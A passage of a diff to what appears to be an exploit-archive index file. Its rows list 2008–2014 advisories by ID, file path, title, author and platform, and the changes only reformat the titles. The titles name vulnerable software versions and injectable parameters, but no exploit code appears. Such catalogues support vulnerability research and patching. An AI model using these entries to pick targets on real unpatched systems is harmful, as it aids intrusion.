2.0/2.1 - Server Multiple Vulnerabilities",2008-02-21,"Luigi Auriemma",multiple,dos,0 -31286,platforms/asp/webapps/31286.txt,"Citrix MetaFrame Web Manager 'login.asp' Cross-Site Scripting Vulnerability",2008-02-22,Handrix,asp,webapps,0 -31287,platforms/php/webapps/31287.txt,"PHP-Nuke Recipe Module 1.3 'recipeid' Parameter SQL Injection Vulnerability",2008-02-23,S@BUN,php,webapps,0 -31288,platforms/php/webapps/31288.txt,"Joomla! and Mambo 'com_hello_world' Component 'id' Parameter SQL Injection Vulnerability",2008-02-23,S@BUN,php,webapps,0 -31289,platforms/php/webapps/31289.txt,"PHP-Nuke Gallery 1.3 Module 'artid' Parameter SQL Injection Vulnerability",2008-02-23,S@BUN,php,webapps,0 -31290,platforms/php/webapps/31290.txt,"auraCMS 2.2 'lihatberita' Module 'id' Parameter SQL Injection Vulnerability",2008-02-23,S@BUN,php,webapps,0 -31291,platforms/php/webapps/31291.txt,"Joomla! and Mambo 'com_publication' Component 'pid' Parameter SQL Injection Vulnerability",2008-02-25,"Aria-Security Team",php,webapps,0 -31292,platforms/php/webapps/31292.txt,"Joomla! and Mambo 'com_blog' Component 'pid' Parameter SQL Injection Vulnerability",2008-02-25,"Aria-Security Team",php,webapps,0 -31293,platforms/php/webapps/31293.txt,"Gary's Cookbook 3.0 'id' Parameter SQL Injection Vulnerability",2008-02-25,S@BUN,php,webapps,0 -31294,platforms/php/webapps/31294.txt,"Softbiz Jokes and Funny Pictures Script 'sbcat_id' Parameter SQL Injection Vulnerability",2008-02-25,-=Mizo=-,php,webapps,0 -31295,platforms/php/webapps/31295.txt,"Joomla! and Mambo 'com_wines' 1.0 Component 'id' Parameter SQL Injection Vulnerability",2008-02-25,S@BUN,php,webapps,0 -31296,platforms/php/webapps/31296.txt,"Galore Simple Shop 3.1 'section' Parameter SQL Injection Vulnerability",2008-02-25,S@BUN,php,webapps,0 -31297,platforms/php/webapps/31297.txt,"PHP-Nuke Sell Module 'cid' Parameter SQL Injection Vulnerability",2008-02-25,"Aria-Security Team",php,webapps,0 -31298,platforms/hardware/remote/31298.txt,"Packeteer PacketShaper and PolicyCenter 8.2.2 'FILELIST' Parameter Cross-Site Scripting Vulnerability",2008-02-25,nnposter,hardware,remote,0 -31299,platforms/jsp/webapps/31299.txt,"Alkacon OpenCms 7.0.3 'tree_files.jsp' Cross-Site Scripting Vulnerability",2008-02-25,nnposter,jsp,webapps,0 +31286,platforms/asp/webapps/31286.txt,"Citrix MetaFrame Web Manager - 'login.asp' Cross-Site Scripting Vulnerability",2008-02-22,Handrix,asp,webapps,0 +31287,platforms/php/webapps/31287.txt,"PHP-Nuke Recipe Module 1.3 - 'recipeid' Parameter SQL Injection Vulnerability",2008-02-23,S@BUN,php,webapps,0 +31288,platforms/php/webapps/31288.txt,"Joomla! and Mambo 'com_hello_world' Component - 'id' Parameter SQL Injection Vulnerability",2008-02-23,S@BUN,php,webapps,0 +31289,platforms/php/webapps/31289.txt,"PHP-Nuke Gallery 1.3 Module - 'artid' Parameter SQL Injection Vulnerability",2008-02-23,S@BUN,php,webapps,0 +31290,platforms/php/webapps/31290.txt,"auraCMS 2.2 'lihatberita' Module - 'id' Parameter SQL Injection Vulnerability",2008-02-23,S@BUN,php,webapps,0 +31291,platforms/php/webapps/31291.txt,"Joomla! and Mambo 'com_publication' Component - 'pid' Parameter SQL Injection Vulnerability",2008-02-25,"Aria-Security Team",php,webapps,0 +31292,platforms/php/webapps/31292.txt,"Joomla! and Mambo 'com_blog' Component - 'pid' Parameter SQL Injection Vulnerability",2008-02-25,"Aria-Security Team",php,webapps,0 +31293,platforms/php/webapps/31293.txt,"Gary's Cookbook 3.0 - 'id' Parameter SQL Injection Vulnerability",2008-02-25,S@BUN,php,webapps,0 +31294,platforms/php/webapps/31294.txt,"Softbiz Jokes and Funny Pictures Script - 'sbcat_id' Parameter SQL Injection Vulnerability",2008-02-25,-=Mizo=-,php,webapps,0 +31295,platforms/php/webapps/31295.txt,"Joomla! and Mambo 'com_wines' 1.0 Component - 'id' Parameter SQL Injection Vulnerability",2008-02-25,S@BUN,php,webapps,0 +31296,platforms/php/webapps/31296.txt,"Galore Simple Shop 3.1 - 'section' Parameter SQL Injection Vulnerability",2008-02-25,S@BUN,php,webapps,0 +31297,platforms/php/webapps/31297.txt,"PHP-Nuke Sell Module - 'cid' Parameter SQL Injection Vulnerability",2008-02-25,"Aria-Security Team",php,webapps,0 +31298,platforms/hardware/remote/31298.txt,"Packeteer PacketShaper and PolicyCenter 8.2.2 - 'FILELIST' Parameter Cross-Site Scripting Vulnerability",2008-02-25,nnposter,hardware,remote,0 +31299,platforms/jsp/webapps/31299.txt,"Alkacon OpenCms 7.0.3 - 'tree_files.jsp' Cross-Site Scripting Vulnerability",2008-02-25,nnposter,jsp,webapps,0 31300,platforms/windows/dos/31300.txt,"SurgeMail and WebMail <= 3.0 - 'Page' Command Remote Format String Vulnerability",2008-02-25,"Luigi Auriemma",windows,dos,0 31301,platforms/windows/dos/31301.txt,"SurgeMail 3.0 - Real CGI executables Remote Buffer Overflow Vulnerability",2008-02-25,"Luigi Auriemma",windows,dos,0 -31302,platforms/windows/dos/31302.txt,"SurgeFTP 2.3a2 'Content-Length' Parameter NULL Pointer Denial Of Service Vulnerability",2008-02-25,"Luigi Auriemma",windows,dos,0 -31303,platforms/php/webapps/31303.txt,"Joomla! and Mambo 'com_inter' Component 'id' Parameter SQL Injection Vulnerability",2008-02-25,The-0utl4w,php,webapps,0 -31304,platforms/php/webapps/31304.txt,"Plume CMS 1.2.2 'manager/xmedia.php' Cross-Site Scripting Vulnerability",2008-02-21,"Omer Singer",php,webapps,0 -31305,platforms/linux/dos/31305.c,"Linux 3.4+ recvmmsg x32 compat Proof of Concept",2014-01-31,"Kees Cook",linux,dos,0 -31306,platforms/hardware/dos/31306.txt,"Nortel UNIStim IP Phone Remote Ping Denial of Service Vulnerability",2008-02-26,sipherr,hardware,dos,0 -31307,platforms/hardware/dos/31307.py,"Android Web Browser GIF File Heap-Based Buffer Overflow Vulnerability",2008-03-04,"Alfredo Ortega",hardware,dos,0 -31308,platforms/hardware/dos/31308.html,"Android Web Browser BMP File Integer Overflow Vulnerability",2008-03-04,"Alfredo Ortega",hardware,dos,0 -31309,platforms/linux/remote/31309.c,"Ghostscript 8.0.1/8.15 zseticcspace() Function Buffer Overflow Vulnerability",2008-02-27,"Will Drewry",linux,remote,0 +31302,platforms/windows/dos/31302.txt,"SurgeFTP 2.3a2 'Content-Length' Parameter NULL Pointer - Denial Of Service Vulnerability",2008-02-25,"Luigi Auriemma",windows,dos,0 +31303,platforms/php/webapps/31303.txt,"Joomla! and Mambo 'com_inter' Component - 'id' Parameter SQL Injection Vulnerability",2008-02-25,The-0utl4w,php,webapps,0 +31304,platforms/php/webapps/31304.txt,"Plume CMS 1.2.2 - 'manager/xmedia.php' Cross-Site Scripting Vulnerability",2008-02-21,"Omer Singer",php,webapps,0 +31305,platforms/linux/dos/31305.c,"Linux 3.4+ recvmmsg x32 compat - Proof of Concept",2014-01-31,"Kees Cook",linux,dos,0 +31306,platforms/hardware/dos/31306.txt,"Nortel UNIStim IP Phone - Remote Ping Denial of Service Vulnerability",2008-02-26,sipherr,hardware,dos,0 +31307,platforms/hardware/dos/31307.py,"Android Web Browser - GIF File Heap-Based Buffer Overflow Vulnerability",2008-03-04,"Alfredo Ortega",hardware,dos,0 +31308,platforms/hardware/dos/31308.html,"Android Web Browser - BMP File Integer Overflow Vulnerability",2008-03-04,"Alfredo Ortega",hardware,dos,0 +31309,platforms/linux/remote/31309.c,"Ghostscript 8.0.1/8.15 - zseticcspace() Function Buffer Overflow Vulnerability",2008-02-27,"Will Drewry",linux,remote,0 31310,platforms/windows/dos/31310.txt,"Trend Micro OfficeScan - Buffer Overflow Vulnerability and Denial of Service Vulnerability",2008-02-27,"Luigi Auriemma",windows,dos,0 -31311,platforms/hardware/remote/31311.txt,"Juniper Networks Secure Access 2000 'rdremediate.cgi' Cross Site Scripting Vulnerability",2008-02-28,"Richard Brain",hardware,remote,0 -31312,platforms/php/webapps/31312.txt,"Barryvan Compo Manager 0.3 'main.php' Remote File Include Vulnerability",2008-02-28,MhZ91,php,webapps,0 -31313,platforms/cgi/webapps/31313.txt,"Juniper Networks Secure Access 2000 Web Root Path Disclosure Vulnerability",2008-02-28,"Richard Brain",cgi,webapps,0 -31314,platforms/asp/webapps/31314.txt,"Flicks Software AuthentiX 6.3b1 'username' Parameter Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"William Hicks",asp,webapps,0 -31315,platforms/php/webapps/31315.txt,"XRMS 1.99.2 CRM 'msg' Parameter Cross Site Scripting Vulnerability",2008-02-28,vijayv,php,webapps,0 -31316,platforms/php/webapps/31316.txt,"Centreon 1.4.2 color_picker.php Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"Julien CAYSSOL",php,webapps,0 -31317,platforms/php/webapps/31317.txt,"netOffice Dwins 1.3 Authentication Bypass Vulnerability and Arbitrary File Upload Vulnerability",2008-02-29,RawSecurity.org,php,webapps,0 -31318,platforms/php/webapps/31318.txt,"Centreon 1.4.2.3 index.php Local File Include Vulnerability",2008-02-29,JosS,php,webapps,0 -31319,platforms/php/webapps/31319.txt,"Simple PHP Scripts gallery 0.x index.php Cross-Site Scripting Vulnerability",2008-02-29,ZoRLu,php,webapps,0 -31320,platforms/php/webapps/31320.txt,"phpMyTourney 2 tourney/index.php Remote File Include Vulnerability",2008-02-29,"HACKERS PAL",php,webapps,0 -31321,platforms/php/webapps/31321.txt,"Heathco Software h2desk Multiple Information Disclosure Vulnerabilities",2008-03-01,joseph.giron13,php,webapps,0 -31322,platforms/php/webapps/31322.txt,"PHP-Nuke Johannes Hass 'gaestebuch 2.2 Module 'id' Parameter SQL Injection Vulnerability",2008-03-01,TurkishWarriorr,php,webapps,0 -31323,platforms/windows/dos/31323.c,"ADI Convergence Galaxy FTP Server Password Remote Denial of Service Vulnerability",2008-03-01,"Maks M",windows,dos,0 -31324,platforms/php/webapps/31324.txt,"KC Wiki 1.0 minimal/wiki.php page Parameter Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0 -31325,platforms/php/webapps/31325.txt,"KC Wiki 1.0 simplest/wiki.php page Parameter Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0 -31326,platforms/php/webapps/31326.txt,"Flyspray 0.9.9 Information Disclosure, HTML Injection, and Cross-Site Scripting Vulnerabilities",2008-03-03,"Digital Security Research Group",php,webapps,0 +31311,platforms/hardware/remote/31311.txt,"Juniper Networks Secure Access 2000 - 'rdremediate.cgi' Cross Site Scripting Vulnerability",2008-02-28,"Richard Brain",hardware,remote,0 +31312,platforms/php/webapps/31312.txt,"Barryvan Compo Manager 0.3 - 'main.php' Remote File Include Vulnerability",2008-02-28,MhZ91,php,webapps,0 +31313,platforms/cgi/webapps/31313.txt,"Juniper Networks Secure Access 2000 Web - Root Path Disclosure Vulnerability",2008-02-28,"Richard Brain",cgi,webapps,0 +31314,platforms/asp/webapps/31314.txt,"Flicks Software AuthentiX 6.3b1 - 'username' Parameter Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"William Hicks",asp,webapps,0 +31315,platforms/php/webapps/31315.txt,"XRMS 1.99.2 - CRM 'msg' Parameter Cross Site Scripting Vulnerability",2008-02-28,vijayv,php,webapps,0 +31316,platforms/php/webapps/31316.txt,"Centreon 1.4.2 - color_picker.php Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"Julien CAYSSOL",php,webapps,0 +31317,platforms/php/webapps/31317.txt,"netOffice Dwins 1.3 - Authentication Bypass Vulnerability and Arbitrary File Upload Vulnerability",2008-02-29,RawSecurity.org,php,webapps,0 +31318,platforms/php/webapps/31318.txt,"Centreon 1.4.2.3 - index.php Local File Include Vulnerability",2008-02-29,JosS,php,webapps,0 +31319,platforms/php/webapps/31319.txt,"Simple PHP Scripts gallery 0.x - index.php Cross-Site Scripting Vulnerability",2008-02-29,ZoRLu,php,webapps,0 +31320,platforms/php/webapps/31320.txt,"phpMyTourney 2 - tourney/index.php Remote File Include Vulnerability",2008-02-29,"HACKERS PAL",php,webapps,0 +31321,platforms/php/webapps/31321.txt,"Heathco Software h2desk - Multiple Information Disclosure Vulnerabilities",2008-03-01,joseph.giron13,php,webapps,0 +31322,platforms/php/webapps/31322.txt,"PHP-Nuke Johannes Hass 'gaestebuch 2.2 Module - 'id' Parameter SQL Injection Vulnerability",2008-03-01,TurkishWarriorr,php,webapps,0 +31323,platforms/windows/dos/31323.c,"ADI Convergence Galaxy FTP Server Password - Remote Denial of Service Vulnerability",2008-03-01,"Maks M",windows,dos,0 +31324,platforms/php/webapps/31324.txt,"KC Wiki 1.0 - minimal/wiki.php page Parameter Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0 +31325,platforms/php/webapps/31325.txt,"KC Wiki 1.0 - simplest/wiki.php page Parameter Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0 +31326,platforms/php/webapps/31326.txt,"Flyspray 0.9.9 - Information Disclosure, HTML Injection, and Cross-Site Scripting Vulnerabilities",2008-03-03,"Digital Security Research Group",php,webapps,0 31327,platforms/multiple/dos/31327.txt,"Borland StarTeam 2008 10.0 .57 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",multiple,dos,0 -31328,platforms/php/webapps/31328.txt,"TorrentTrader 1.08 'msg' Parameter HTML Injection Vulnerability",2008-03-03,Dominus,php,webapps,0 -31329,platforms/multiple/webapps/31329..txt,"MediaWiki 1.22.1 PdfHandler Remote Code Execution Exploit",2014-02-01,@u0x,multiple,webapps,0 +31328,platforms/php/webapps/31328.txt,"TorrentTrader 1.08 - 'msg' Parameter HTML Injection Vulnerability",2008-03-03,Dominus,php,webapps,0 +31329,platforms/multiple/webapps/31329..txt,"MediaWiki 1.22.1 PdfHandler - Remote Code Execution Exploit",2014-02-01,@u0x,multiple,webapps,0 31330,platforms/windows/dos/31330.txt,"Borland VisiBroker Smart Agent 08.00.00.C1.03 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",windows,dos,0 -31331,platforms/php/webapps/31331.txt,"PHP-Nuke eGallery 3.0 Module 'pid' Parameter SQL Injection Vulnerability",2008-03-04,"Aria-Security Team",php,webapps,0 -31332,platforms/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module 'fileName' Parameter Local File Include Vulnerability",2008-03-04,The-0utl4w,php,webapps,0 -31333,platforms/bsd/dos/31333.txt,"BSD PPP 'pppx.conf' Local Denial of Service Vulnerability",2008-03-04,sipherr,bsd,dos,0 -31334,platforms/php/webapps/31334.txt,"Mitra Informatika Solusindo Cart 'p' Parameter SQL Injection Vulnerability",2008-03-04,bius,php,webapps,0 -31335,platforms/php/webapps/31335.txt,"MG2 'list' Parameter Cross-Site Scripting Vulnerability",2008-03-04,"Jose Carlos Norte",php,webapps,0 -31336,platforms/php/webapps/31336.txt,"Podcast Generator 0.96.2 'set_permissions.php' Cross-Site Scripting Vulnerability",2008-03-05,ZoRLu,php,webapps,0 -31337,platforms/php/webapps/31337.txt,"WebCT 4.1.5 Email and Discussion Board Messages HTML Injection Vulnerability",2007-06-25,Lupton,php,webapps,0 +31331,platforms/php/webapps/31331.txt,"PHP-Nuke eGallery 3.0 Module - 'pid' Parameter SQL Injection Vulnerability",2008-03-04,"Aria-Security Team",php,webapps,0 +31332,platforms/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module - 'fileName' Parameter Local File Include Vulnerability",2008-03-04,The-0utl4w,php,webapps,0 +31333,platforms/bsd/dos/31333.txt,"BSD PPP 'pppx.conf' - Local Denial of Service Vulnerability",2008-03-04,sipherr,bsd,dos,0 +31334,platforms/php/webapps/31334.txt,"Mitra Informatika Solusindo Cart - 'p' Parameter SQL Injection Vulnerability",2008-03-04,bius,php,webapps,0 +31335,platforms/php/webapps/31335.txt,"MG2 'list' Parameter - Cross-Site Scripting Vulnerability",2008-03-04,"Jose Carlos Norte",php,webapps,0 +31336,platforms/php/webapps/31336.txt,"Podcast Generator 0.96.2 - 'set_permissions.php' Cross-Site Scripting Vulnerability",2008-03-05,ZoRLu,php,webapps,0 +31337,platforms/php/webapps/31337.txt,"WebCT 4.1.5 - Email and Discussion Board Messages HTML Injection Vulnerability",2007-06-25,Lupton,php,webapps,0 31338,platforms/windows/dos/31338.txt,"Perforce Server 2007.3 - Multiple Remote Denial of Service Vulnerabilities",2008-03-05,"Luigi Auriemma",windows,dos,0 -31339,platforms/php/webapps/31339.txt,"PHP-Nuke Yellow_Pages Module 'cid' Parameter SQL Injection Vulnerability",2008-03-05,ZoRLu,php,webapps,0 -31340,platforms/hardware/remote/31340.html,"Check Point VPN-1 UTM Edge NGX 7.0.48x Login Page Cross-Site Scripting Vulnerability",2008-03-06,"Henri Lindberg",hardware,remote,0 -31341,platforms/php/webapps/31341.txt,"Yap Blog 1.1 'index.php' Remote File Include Vulnerability",2008-03-06,THE_MILLER,php,webapps,0 +31339,platforms/php/webapps/31339.txt,"PHP-Nuke Yellow_Pages Module - 'cid' Parameter SQL Injection Vulnerability",2008-03-05,ZoRLu,php,webapps,0 +31340,platforms/hardware/remote/31340.html,"Check Point VPN-1 UTM Edge NGX 7.0.48x - Login Page Cross-Site Scripting Vulnerability",2008-03-06,"Henri Lindberg",hardware,remote,0 +31341,platforms/php/webapps/31341.txt,"Yap Blog 1.1 - 'index.php' Remote File Include Vulnerability",2008-03-06,THE_MILLER,php,webapps,0 31342,platforms/hardware/remote/31342.txt,"Airspan ProST WiMAX Device Web Interface Authentication Bypass Vulnerability",2008-03-06,"Francis Lacoste-Cordeau",hardware,remote,0 31343,platforms/multiple/dos/31343.txt,"Sun Java Runtime Environment 1.x - Image Parsing Heap Buffer Overflow Vulnerability",2008-03-06,"Chris Evans",multiple,dos,0 -31344,platforms/php/webapps/31344.pl,"PHP-Nuke KutubiSitte Module 'kid' Parameter SQL Injection Vulnerability",2008-03-06,r080cy90r,php,webapps,0 -31345,platforms/windows/remote/31345.txt,"MicroWorld eScan Server 9.0.742 Directory Traversal Vulnerability",2008-03-06,"Luigi Auriemma",windows,remote,0 -31346,platforms/linux/local/31346.c,"Linux 3.4+ Arbitrary write with CONFIG_X86_X32",2014-02-02,saelo,linux,local,0 -31347,platforms/linux/local/31347.c,"linux 3.4+ local root (CONFIG_X86_X32=y)",2014-02-02,rebel,linux,local,0 +31344,platforms/php/webapps/31344.pl,"PHP-Nuke KutubiSitte Module - 'kid' Parameter SQL Injection Vulnerability",2008-03-06,r080cy90r,php,webapps,0 +31345,platforms/windows/remote/31345.txt,"MicroWorld eScan Server 9.0.742 - Directory Traversal Vulnerability",2008-03-06,"Luigi Auriemma",windows,remote,0 +31346,platforms/linux/local/31346.c,"Linux 3.4+ - Arbitrary write with CONFIG_X86_X32",2014-02-02,saelo,linux,local,0 +31347,platforms/linux/local/31347.c,"linux 3.4+ - Local Root (CONFIG_X86_X32=y)",2014-02-02,rebel,linux,local,0 31350,platforms/php/webapps/31350.txt,"CiMe - Citas Médicas - Multiple Vulnerabilities",2014-02-03,vinicius777,php,webapps,80 -31351,platforms/php/webapps/31351.txt,"PHP-Nuke 4nChat Module 0.91 'roomid' Parameter SQL Injection Vulnerability",2008-03-06,meloulisi,php,webapps,0 -31352,platforms/php/webapps/31352.txt,"ImageVue 1.7 popup.php path Parameter XSS",2008-03-07,ZoRLu,php,webapps,0 -31353,platforms/php/webapps/31353.txt,"ImageVue 1.7 dir2.php path Parameter XSS",2008-03-07,ZoRLu,php,webapps,0 -31354,platforms/php/webapps/31354.txt,"ImageVue 1.7 upload.php path Parameter XSS",2008-03-07,ZoRLu,php,webapps,0 -31355,platforms/php/webapps/31355.txt,"ImageVue 1.7 dirxml.php path Parameter XSS",2008-03-07,ZoRLu,php,webapps,0 -31356,platforms/php/webapps/31356.txt,"WordPress 2.3.2 wp-admin/users.php inviteemail Parameter XSS",2008-03-07,Doz,php,webapps,0 -31357,platforms/php/webapps/31357.txt,"WordPress 2.3.2 wp-admin/invites.php to Parameter XSS",2008-03-07,Doz,php,webapps,0 -31358,platforms/php/webapps/31358.txt,"Specimen Image Database taxonservice.php dir Parameter Remote File Inclusion",2008-03-07,ZoRLu,php,webapps,0 +31351,platforms/php/webapps/31351.txt,"PHP-Nuke 4nChat Module 0.91 - 'roomid' Parameter SQL Injection Vulnerability",2008-03-06,meloulisi,php,webapps,0 +31352,platforms/php/webapps/31352.txt,"ImageVue 1.7 - popup.php path Parameter XSS",2008-03-07,ZoRLu,php,webapps,0 +31353,platforms/php/webapps/31353.txt,"ImageVue 1.7 - dir2.php path Parameter XSS",2008-03-07,ZoRLu,php,webapps,0 +31354,platforms/php/webapps/31354.txt,"ImageVue 1.7 - upload.php path Parameter XSS",2008-03-07,ZoRLu,php,webapps,0 +31355,platforms/php/webapps/31355.txt,"ImageVue 1.7 - dirxml.php path Parameter XSS",2008-03-07,ZoRLu,php,webapps,0 +31356,platforms/php/webapps/31356.txt,"WordPress 2.3.2 - wp-admin/users.php inviteemail Parameter XSS",2008-03-07,Doz,php,webapps,0 +31357,platforms/php/webapps/31357.txt,"WordPress 2.3.2 - wp-admin/invites.php to Parameter XSS",2008-03-07,Doz,php,webapps,0 +31358,platforms/php/webapps/31358.txt,"Specimen Image Database - taxonservice.php dir Parameter Remote File Inclusion",2008-03-07,ZoRLu,php,webapps,0 31359,platforms/windows/remote/31359.html,"Microsoft Internet Explorer 7.0 Combined JavaScript and XML Remote Information Disclosure Vulnerability",2008-03-07,"Ronald van den Heetkamp",windows,remote,0 31360,platforms/windows/dos/31360.txt,"MailEnable 3.13 and Prior - IMAP Service Multiple Remote Vulnerabilities",2008-03-07,"Luigi Auriemma",windows,dos,0 31361,platforms/windows/dos/31361.txt,"Microsoft Office 2000/2003/2004/XP - File Memory Corruption Vulnerability",2008-03-07,anonymous,windows,dos,0 -31362,platforms/multiple/remote/31362.txt,"Neptune Web Server 3.0 404 Error Page Cross Site Scripting Vulnerability",2008-03-07,NetJackal,multiple,remote,0 +31362,platforms/multiple/remote/31362.txt,"Neptune Web Server 3.0 - 404 Error Page Cross Site Scripting Vulnerability",2008-03-07,NetJackal,multiple,remote,0 31363,platforms/windows/dos/31363.txt,"Panda Internet Security/Antivirus+Firewall 2008 - CPoint.sys Memory Corruption Vulnerability",2008-03-08,"Tobias Klein",windows,dos,0 -31364,platforms/hardware/remote/31364.txt,"F5 BIG-IP 9.4.3 Web Management Interface Console HTML Injection Vulnerability",2008-03-08,nnposter,hardware,remote,0 -31365,platforms/php/webapps/31365.txt,"Alkacon OpenCMS 7.0.3 logfileViewSettings.jsp filePath Parameter XSS",2008-03-08,nnposter,php,webapps,0 -31366,platforms/php/webapps/31366.txt,"Alkacon OpenCMS 7.0.3 logfileViewSettings.jsp filePath.0 Parameter Arbitrary File Access",2008-03-08,nnposter,php,webapps,0 -31367,platforms/php/webapps/31367.txt,"Batchelor Media BM Classifieds Multiple SQL Injection Vulnerabilities",2008-03-09,xcorpitx,php,webapps,0 -31368,platforms/php/webapps/31368.txt,"PHP-Nuke 4nAlbum Module 0.92 'pid' Parameter SQL Injection Vulnerability",2008-03-10,meloulisi,php,webapps,0 -31369,platforms/php/webapps/31369.txt,"Gallarific search.php query Parameter XSS",2008-03-10,ZoRLu,php,webapps,0 -31370,platforms/php/webapps/31370.txt,"Gallarific Multiple Script Direct Request Authentication Bypass",2008-03-10,ZoRLu,php,webapps,0 -31371,platforms/php/webapps/31371.txt,"EasyImageCatalogue 1.31 index.php Multiple Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 -31372,platforms/php/webapps/31372.txt,"EasyImageCatalogue 1.31 thumber.php dir Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 -31373,platforms/php/webapps/31373.txt,"EasyImageCatalogue 1.31 describe.php d Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 -31374,platforms/php/webapps/31374.txt,"EasyImageCatalogue 1.31 addcomment.php d Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 -31375,platforms/php/webapps/31375.txt,"Drake CMS 0.4.11 RC8 'd_root' Parameter Local File Include Vulnerability",2008-03-10,THE_MILLER,php,webapps,0 -31376,platforms/multiple/dos/31376.txt,"Acronis True Image Echo Enterprise Server 9.5.0.8072 Multiple Remote Denial of Service Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0 -31377,platforms/php/webapps/31377.txt,"PHP-Nuke Hadith Module 'cat' Parameter SQL Injection Vulnerability",2008-03-10,Lovebug,php,webapps,0 -31378,platforms/multiple/dos/31378.txt,"RemotelyAnywhere 8.0.668 'Accept-Charset' Parameter NULL Pointer Denial Of Service Vulnerability",2008-03-10,"Luigi Auriemma",multiple,dos,0 -31379,platforms/php/webapps/31379.txt,"EncapsGallery 1.11.2 watermark.php file Parameter XSS",2008-03-10,ZoRLu,php,webapps,0 -31380,platforms/php/webapps/31380.txt,"EncapsGallery 1.11.2 catalog_watermark.php file Parameter XSS",2008-03-10,ZoRLu,php,webapps,0 +31364,platforms/hardware/remote/31364.txt,"F5 BIG-IP 9.4.3 - Web Management Interface Console HTML Injection Vulnerability",2008-03-08,nnposter,hardware,remote,0 +31365,platforms/php/webapps/31365.txt,"Alkacon OpenCMS 7.0.3 - logfileViewSettings.jsp filePath Parameter XSS",2008-03-08,nnposter,php,webapps,0 +31366,platforms/php/webapps/31366.txt,"Alkacon OpenCMS 7.0.3 - logfileViewSettings.jsp filePath.0 Parameter Arbitrary File Access",2008-03-08,nnposter,php,webapps,0 +31367,platforms/php/webapps/31367.txt,"Batchelor Media BM Classifieds - Multiple SQL Injection Vulnerabilities",2008-03-09,xcorpitx,php,webapps,0 +31368,platforms/php/webapps/31368.txt,"PHP-Nuke 4nAlbum Module 0.92 - 'pid' Parameter SQL Injection Vulnerability",2008-03-10,meloulisi,php,webapps,0 +31369,platforms/php/webapps/31369.txt,"Gallarific - search.php query Parameter XSS",2008-03-10,ZoRLu,php,webapps,0 +31370,platforms/php/webapps/31370.txt,"Gallarific - Multiple Script Direct Request Authentication Bypass",2008-03-10,ZoRLu,php,webapps,0 +31371,platforms/php/webapps/31371.txt,"EasyImageCatalogue 1.31 - index.php Multiple Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 +31372,platforms/php/webapps/31372.txt,"EasyImageCatalogue 1.31 - thumber.php dir Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 +31373,platforms/php/webapps/31373.txt,"EasyImageCatalogue 1.31 - describe.php d Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 +31374,platforms/php/webapps/31374.txt,"EasyImageCatalogue 1.31 - addcomment.php d Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 +31375,platforms/php/webapps/31375.txt,"Drake CMS 0.4.11 RC8 - 'd_root' Parameter Local File Include Vulnerability",2008-03-10,THE_MILLER,php,webapps,0 +31376,platforms/multiple/dos/31376.txt,"Acronis True Image Echo Enterprise Server 9.5.0.8072 - Multiple Remote Denial of Service Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0 +31377,platforms/php/webapps/31377.txt,"PHP-Nuke Hadith Module - 'cat' Parameter SQL Injection Vulnerability",2008-03-10,Lovebug,php,webapps,0 +31378,platforms/multiple/dos/31378.txt,"RemotelyAnywhere 8.0.668 - 'Accept-Charset' Parameter NULL Pointer Denial Of Service Vulnerability",2008-03-10,"Luigi Auriemma",multiple,dos,0 +31379,platforms/php/webapps/31379.txt,"EncapsGallery 1.11.2 - watermark.php file Parameter XSS",2008-03-10,ZoRLu,php,webapps,0 +31380,platforms/php/webapps/31380.txt,"EncapsGallery 1.11.2 - catalog_watermark.php file Parameter XSS",2008-03-10,ZoRLu,php,webapps,0 31381,platforms/windows/dos/31381.txt,"Motorola Timbuktu Pro 8.6.5 - Multiple Denial of Service Vulnerabilities",2008-03-10,"Luigi Auriemma",windows,dos,0 -31382,platforms/php/webapps/31382.txt,"Joomla! and Mambo 'ensenanzas' Component 'id' Parameter SQL Injection Vulnerability",2008-03-11,The-0utl4w,php,webapps,0 -31383,platforms/php/webapps/31383.txt,"PHP-Nuke NukeC30 3.0 Module 'id_catg' Parameter SQL Injection Vulnerability",2008-03-11,Houssamix,php,webapps,0 -31384,platforms/php/webapps/31384.txt,"PHP-Nuke zClassifieds Module 'cat' Parameter SQL Injection Vulnerability",2008-03-11,Lovebug,php,webapps,0 -31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 (.m3u) - SEH Buffer Overflow ASLR+DEP Bypass",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0 -31387,platforms/php/webapps/31387.txt,"Uberghey CMS 0.3.1 'index.php' Multiple Local File Include Vulnerabilities",2008-03-12,muuratsalo,php,webapps,0 -31388,platforms/php/webapps/31388.txt,"Travelsized CMS 0.4.1 'index.php' Multiple Local File Include Vulnerabilities",2008-03-12,muuratsalo,php,webapps,0 -31389,platforms/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 login Action Multiple Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 -31390,platforms/php/webapps/31390.txt,"Chris LaPointe Download Center 1.2 browse Action category Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 -31391,platforms/php/webapps/31391.txt,"Chris LaPointe Download Center 1.2 search_results Action search Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 -31392,platforms/php/webapps/31392.txt,"MAXdev My eGallery Module 3.04 For Xoops 'gid' Parameter SQL Injection Vulnerability",2008-03-12,S@BUN,php,webapps,0 -31393,platforms/php/webapps/31393.txt,"Jeebles Directory 2.9.60 Multiple Cross Site Scripting Vulnerabilities",2008-03-12,ZoRLu,php,webapps,0 